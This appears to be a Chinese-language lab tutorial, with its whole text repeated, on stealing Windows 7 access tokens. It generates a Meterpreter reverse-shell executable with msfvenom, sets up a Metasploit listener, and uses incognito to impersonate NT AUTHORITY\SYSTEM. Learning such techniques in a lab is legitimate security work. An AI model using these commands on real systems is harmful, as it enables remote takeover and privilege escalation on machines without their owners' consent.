1. 程式人生 > 其它 >Windows7令牌竊取

Windows7令牌竊取

令牌(token)

訪問令牌(Access Token):表示訪問控制操作主體的系統物件
會話令牌(Session Token):是互動會話中唯一的身份識別符號。
密保令牌(Security Token):又叫做認證令牌或硬體令牌,是一種計算機身份校驗的物理裝置,例如U盾

Delegation Token:也就是授權令牌,它支援互動式登入(例如可以通過遠端桌面登入訪問)
Impresonation Token:模擬令牌,它是非互動的會話。

復現準備

靶機:Windows7 192.168.1.15

攻擊機:Kali 2021 192.168.1.16

生成反彈Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=7777 -f exe -o shell.exe

攻擊

獲取監聽

msfconsle
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.1.16
lhost => 192.168.1.16
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > exploit 

開啟靶機,雙擊生成的Shell,然後kali獲取到反彈的shell

# 進入incognito
use incognito
# 列出令牌
list_tokens -u 
# 令牌假冒 SYSTEM
impersonate_token 'NT AUTHORITY\SYSTEM'

# Windows7令牌竊取

令牌(token)

訪問令牌(Access Token):表示訪問控制操作主體的系統物件
會話令牌(Session Token):是互動會話中唯一的身份識別符號。
密保令牌(Security Token):又叫做認證令牌或硬體令牌,是一種計算機身份校驗的物理裝置,例如U盾

Delegation Token:也就是授權令牌,它支援互動式登入(例如可以通過遠端桌面登入訪問)
Impresonation Token:模擬令牌,它是非互動的會話。

復現準備

靶機:Windows7 192.168.1.15

攻擊機:Kali 2021 192.168.1.16

生成反彈Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=7777 -f exe -o shell.exe

攻擊

獲取監聽

msfconsle
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.1.16
lhost => 192.168.1.16
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > exploit 

開啟靶機,雙擊生成的Shell,然後kali獲取到反彈的shell

# 進入incognito
use incognito
# 列出令牌
list_tokens -u 
# 令牌假冒 SYSTEM
impersonate_token 'NT AUTHORITY\SYSTEM'